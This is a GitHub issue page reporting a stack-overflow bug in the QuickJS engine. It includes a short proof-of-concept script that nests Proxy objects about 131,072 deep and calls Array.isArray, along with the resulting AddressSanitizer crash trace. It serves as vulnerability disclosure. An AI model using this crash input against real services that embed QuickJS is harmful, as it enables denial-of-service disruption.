Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Version : 2788d71
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Array . isArray ( [ ] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( [ ] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( [ ] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r = new Proxy ( [ ] , { } ) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;
// poc.js for (var r = new Proxy ([],{}) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy (r, {}); Array . isArray (r);
The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively. infinite loop occurs here.
$ ./qjs poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0) #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242 #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975 #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250 #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975 #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250 #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975 ... #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975 #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250 #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975 #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250 #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975 #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250 SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray ==2347865==ABORTING
Credits: @Ye0nny, @EJueon of the seclab-yonsei.
The text was updated successfully, but these errors were encountered:
No branches or pull requests
QuickJS Version
Version : 2788d71
platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
Build
PoC
testcase
Execution steps & Output
The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
infinite loop occurs here.
Credits: @Ye0nny, @EJueon of the seclab-yonsei.
The text was updated successfully, but these errors were encountered: